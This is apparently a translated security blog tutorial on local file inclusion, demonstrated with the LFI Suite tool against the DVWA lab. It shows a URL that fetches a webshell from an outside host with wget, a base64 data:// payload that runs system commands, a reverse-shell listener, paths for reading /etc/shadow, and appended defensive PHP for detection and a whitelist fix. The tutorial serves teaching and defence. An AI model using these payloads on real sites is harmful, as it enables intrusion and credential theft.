2025-02-24 Update. From: SLTechnology News&Howtos > Network Security
Shulou (Shulou.com) 06/01 Report
Today I saw a local file inclusion exploitation tool mentioned in an official WeChat account, and watched a video of a foreign expert using it. It looked very powerful: with this tool, a site with a local file inclusion vulnerability can be exploited to return an LFI shell, and through that LFI shell a reverse connection can be obtained and commands executed. In the past, local file inclusion was mostly used only to read files, while getting a shell required a remote file inclusion. This article is a brief introduction to local file inclusion and its exploitation, mainly with this tool; it also records the process so it can be looked up later, and the source code will be studied when time allows. Experts, please skip this! :)
0x01 Principle of file inclusion vulnerabilities
File inclusion vulnerabilities arise mainly because programmers put common code in a separate file and then include that file from other files. If the files to be included are hard-coded, there is generally no security problem. Sometimes, however, it is not known in advance which file needs to be included, so a variable is used to pass the file name, and if that variable is not checked and filtered before it is used in the include, malicious data submitted from outside enters the inclusion process through the variable and the submitted data is executed. File inclusion is usually divided into local file inclusion (Local File Inclusion, LFI) and remote file inclusion (Remote File Inclusion, RFI). When allow_url_fopen and allow_url_include are both On, remote file inclusion is possible; when allow_url_fopen is Off and allow_url_include is On, only local file inclusion is possible, as shown in the php.ini configuration in figure 1. This article is mainly about local file inclusion, so allow_url_fopen is set to Off.
Figure 1 php.ini configuration
In addition, file inclusion vulnerabilities mainly involve four dangerous functions: include(), require(), include_once() and require_once().
include(): the file is included only when the include statement is executed; if the included file is not found, only a warning is generated and the script continues.
require(): the file is included as soon as the program runs; if the included file is not found, a fatal error occurs and the script stops.
include_once() and require_once(): if the file's code has already been included, it is not included again. (From Jianshu)
0x02 Harm of file inclusion vulnerabilities
Through a file inclusion vulnerability, sensitive files and source code files on the system, such as password files, can be read. By brute-forcing a password file, an operating system account can be obtained if the cracking succeeds, and an exposed remote access service can then be used to connect to and control the host. In addition, file inclusion vulnerabilities can lead to arbitrary code execution, whether the inclusion is local or remote!
In short, there are three common ways to exploit it:
First, read other files on the target host, mainly local files.
Second, include a runnable malicious web page, mainly a remote file, provided that allow_url_fopen is enabled (it is enabled by default, and few people change it).
Third, include a code file that creates a file. The shell obtained through the file inclusion vulnerability is not persistent: once the vulnerability is fixed, the shell is gone, so a real shell has to be created. We can first include a pseudo shell that can execute commands, then use wget with the -O parameter (something like:
http://x.x.x.x/index.php?page=http://www.1ster.cn/cmd.txt?cmd=wget http://x.x.x.x/muma.txt -O muma.php) to get a real webshell. If there is no wget command on the system, or the target directory is not writable, we can include a script that creates a file and then upload the webshell file through that script.
In fact, besides the three points above, there is another: executing arbitrary commands!
0x03 Experimental environment
The experiments in this article are demonstrated on the DVWA platform, shown in figure 2. DVWA (Damn Vulnerable Web Application) is a web vulnerability platform written in PHP+MySQL; simply put, it is a so-called vulnerable target website. The platform contains common web security vulnerabilities such as SQL injection, XSS, local file inclusion and command execution. It is open source and can be downloaded directly from the official website.
Figure 2 DVWA platform
0x04 Local file inclusion exploitation tool
This time we mainly use the LFI Suite local file inclusion tool, a powerful tool written in Python 2.7 that runs on Windows, Linux and OS X and automatically configures and installs the modules it needs on first run. The tool provides nine different file inclusion modules, as shown in figure 3. In addition, once an LFI shell has been obtained through a working attack module, a reverse shell can easily be obtained by typing the "reverseshell" command, provided your own system is listening for the reverse connection, for example with "nc -lvp port".
Figure 3 Nine different file inclusion attack modules
0x05 Reading files through local file inclusion
Previously, local file inclusion vulnerabilities were mostly used to read files, such as the password files on Linux (../etc/shadow and ../etc/passwd), that is, to read files whose physical path is known, as shown in figure 4.
Figure 4 Reading a file under a known path
Here are some simple test cases that can be modified according to the actual situation. The tool's directory also contains many test cases, which you can view yourself!
0x06 Getting an LFI shell with the tool
Run the LFI Suite tool and select the attack module
Run python lfisuite.py directly, as shown in figure 5. Here we choose function module 1.
Figure 5 Running the local file inclusion exploitation tool
Set the cookie
After choosing function module 1, we are prompted to enter the cookie, as shown in figure 6:
Figure 6 Setting the cookie
Get the cookie
In the browser's F12 console, the current cookie can be obtained by typing document.cookie, as shown in figure 7.
Figure 7 Getting the cookie
LFI shell obtained successfully
After entering the cookie, we pick an attack module to try; here we select 3. After selecting the attack module, we enter the vulnerable URL and obtain a shell, as shown in figure 8.
Figure 8 LFI shell obtained successfully
0x07 Getting an LFI shell with the automatic module
If we don't know which module can return a shell, we can choose the automatic module.
Figure 9 Automatic attack module
After selecting it, we need to select a file containing the paths to try; a file from the current directory can be used.
Figure 10 Selecting a file
After the file is selected, the tool tries each candidate path and exploits the one that works.
Figure 11 Select a file
As shown in figure 12, we successfully obtained a shell.
Figure 12 successful acquisition of shell
0x08 Getting a reverse connection
After obtaining the LFI shell, we can use reverseshell to get a reverse connection. First we listen for the reverse connection, as shown in figure 13.
Figure 13 Setting up the listener for the reverse connection
After entering reverseshell, we set the IP and port.
Figure 14 Setting the IP and port
At this point we have also successfully obtained a reverse connection, as shown in figure 15.
Figure 15 Getting the reverse connection
0x09 Scanning module
In addition, we can also use the scan module first and then obtain the LFI shell by selecting the corresponding attack module. The usage is the same as above and is not described again.
0x10 Brief introduction of the attack modules
These modules mainly use some PHP functions and pseudo-protocols (stream wrappers). I reproduced them by reading the PHP help documentation, so there are some differences from the tool's source code; see the reference documentation. Due to my limited ability, two of the modules could not be reproduced at all: /proc/self/fd and phpinfo. From the source code, the phpinfo module seems to use a phpinfo injection to upload a file containing PHP code, but I did not manage to exploit it. My programming level is too poor; who can save me!
/proc/self/environ
Check whether /proc/self/environ can be included by visiting http://127.0.0.1/vulnerabilities/fi/?page=../../../../../../../../proc/self/environ. If environment variable information is returned, the file can be accessed; if the response is empty, it generally cannot. Once access is confirmed, PHP code is injected into the User-Agent header; if the injection succeeds, the PHP code is executed when the environment variables are loaded again. Because the file could not be accessed in my environment, the reproduction was unsuccessful; the host is Linux!
php://filter
php://filter is a protocol stream unique to PHP; its function is to process other streams as an "intermediate stream". We can therefore combine it with php://input (see below) to execute PHP code, as shown in figure 16, and also output the result of execution with base64 encoding, as shown in figure 17.
Figure 16 php://filter executing PHP code
Figure 17 php://filter executing PHP code with base64 output
php://input
With php://input, we enter PHP code in the request body and the included input is executed as PHP code, as shown in figure 18; we can also wget a webshell file through the PHP code. To use this module, however, URL inclusion (allow_url_include) must be enabled!
Figure 18 php://input executing PHP code
/proc/self/fd
I don't know how to use it; if an expert passes by, please give me some advice!
access_log
This module mainly uses the log file. The GET request and User-Agent of our visit are recorded in the log, so we can put a one-line PHP shell in the request, as shown in figure 19, or write it in the User-Agent. By including the log file, the one-liner is loaded and the PHP code is executed, as shown in figure 20. Here, however, you need to be able to access the log file and know its path, otherwise it will not succeed. You can include the log file first to see whether it has any content; if there is no content, it is generally inaccessible!
Figure 19 Writing the PHP code into the log
Figure 20 Including the log file that contains the PHP code
phpinfo
From the source code, it seems that phpinfo injection is used to submit a file containing PHP code so that the PHP code is executed; my attempts were still unsuccessful. I will keep studying it when there is time. If you know how, please give me some advice!
data://
The main idea is to print the content with data://, encoded with base64, such as the base64 encoding shown in figure 21, and then include the PHP code through data://, so that data://text/plain;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg== executes the PHP code, as shown in figure 22.
Figure 21 base64 encoding of the PHP code
Figure 22 Executing the PHP code
expect://
expect:// is mainly used to handle interactive streams. The PTY data stream opened through the expect:// wrapper provides access to the process's stdin, stdout and stderr. The wrapper is not enabled by default; to use it, the Expect extension from PECL must be installed. For these reasons this module was not reproduced successfully, and since the wrapper is not enabled by default, no more time was spent on it.
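From the defender's side, the module payloads above (traversal sequences, php://filter, php://input, data://, expect://, /proc/self/environ and log file paths) all show up in the web server's own access log. The following is an added example, not code from the original article or from LFI Suite, that flags such requests; the log lines are constructed for the example.

```php
<?php
// Added example, not code from the original article or from LFI Suite.
// Flags access-log requests carrying the payload shapes used by the modules
// above: traversal, php://filter, php://input, data://, expect://,
// /proc/self/environ and web server log paths.
const LFI_PATTERNS = [
    'traversal'    => '~(\.\./|\.\.\\\\|%2e%2e(%2f|/)|\.\.%2f|%c0%af|%255c)~i',
    'php_wrapper'  => '~php://(filter|input)~i',
    'data_wrapper' => '~data:~i',
    'expect'       => '~expect://~i',
    'proc_self'    => '~/proc/self/(environ|fd)~i',
    'log_file'     => '~/(access|error)[._]log~i',
];

// Returns the names of the indicators found in one request URI. The raw URI
// is tested as well as a once-decoded copy, so %c0%af and double-encoded
// %255c (whose decoded forms the plain ../ pattern misses) are still caught.
function classify_request(string $uri): array
{
    $decoded = rawurldecode($uri);
    $hits = [];
    foreach (LFI_PATTERNS as $name => $re) {
        if (preg_match($re, $uri) || preg_match($re, $decoded)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Apache combined log format: the request line sits between the first quotes.
function scan_access_log(array $lines): array
{
    $flagged = [];
    foreach ($lines as $line) {
        if (!preg_match('~"(?:GET|POST|HEAD) (\S+) HTTP/~', $line, $m)) {
            continue;
        }
        $hits = classify_request($m[1]);
        if ($hits !== []) {
            $flagged[] = ['uri' => $m[1], 'indicators' => $hits];
        }
    }
    return $flagged;
}

// Constructed sample lines (not real traffic); only the first is benign.
$sample = [
    '127.0.0.1 - - [01/Jun/2018:10:00:00 +0000] "GET /vulnerabilities/fi/?page=include.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [01/Jun/2018:10:00:01 +0000] "GET /vulnerabilities/fi/?page=../../../../../../../../proc/self/environ HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [01/Jun/2018:10:00:02 +0000] "GET /vulnerabilities/fi/?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [01/Jun/2018:10:00:03 +0000] "GET /vulnerabilities/fi/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg== HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
];
foreach (scan_access_log($sample) as $f) {
    echo $f['uri'], ' -> ', implode(',', $f['indicators']), PHP_EOL;
}
```

Code placed in the User-Agent for the access_log and /proc/self/environ modules is not in the request URI, so a real deployment should run classify_request() over the User-Agent field of each line as well.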
0x11 Summary and fix
This article gives a simple introduction to file inclusion: the basic principle and harm of file inclusion vulnerabilities and, most importantly, the further exploitation of local file inclusion, through which a reverse connection or LFI shell can be obtained. Writing it has also improved my own understanding of the harm and exploitation of local file inclusion, which no longer stops at reading files!
Regarding the exploitation of this vulnerability, the safest measure is to set allow_url_fopen and allow_url_include to Off, so that the vulnerability cannot be exploited. On the other hand, we can restrict inclusion to a whitelist, which is equivalent to hard-coding: fix the files that can be included directly, which neither affects the business nor can be easily exploited. Finally, we should be sceptical of user input: strictly check and filter user input variables!
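The vulnerable pattern from 0x01 and the whitelist fix recommended here, side by side, as an added example that is not code from the original article or from DVWA; the function names, the pages directory and the 'page' parameter name are assumptions.

```php
<?php
// Added example, not code from the original article or from DVWA. Function
// and page names are assumptions; the pattern is the one behind DVWA's fi/?page=.

// VULNERABLE: the request value goes straight into include(). Traversal
// (../../etc/passwd), wrappers (php://filter, php://input, data://) and log
// file paths all reach the interpreter unchanged.
function include_vulnerable(string $page): void
{
    include $page;
}

// FIX 1 (preferred; equivalent to hard-coding): a fixed allow-list. The
// request value is only a lookup key; the path given to include() is ours.
const ALLOWED_PAGES = [
    'home'    => __DIR__ . '/pages/home.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

function include_allowlisted(string $page): bool
{
    if (!array_key_exists($page, ALLOWED_PAGES)) {
        return false;               // unknown key: nothing is included
    }
    require_once ALLOWED_PAGES[$page];
    return true;
}

// FIX 2 (when the set of pages is not fixed): keep only the file name,
// resolve the real path and require it to sit inside one directory.
// realpath() returns false for php://, data://, expect:// and for files
// that do not exist; the prefix check also catches a symlink pointing out.
function include_within(string $baseDir, string $page): bool
{
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . basename($page));
    if ($base === false || $path === false) {
        return false;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;               // resolved outside the page directory
    }
    require_once $path;
    return true;
}

// Keep allow_url_include=Off in php.ini (figure 1) as well; it is defence in
// depth, not the fix. Parameter name 'page' as in DVWA (assumption here).
$page = (string)($_GET['page'] ?? 'home');
if (!include_allowlisted($page)) {
    http_response_code(404);
    echo 'Unknown page';
}
```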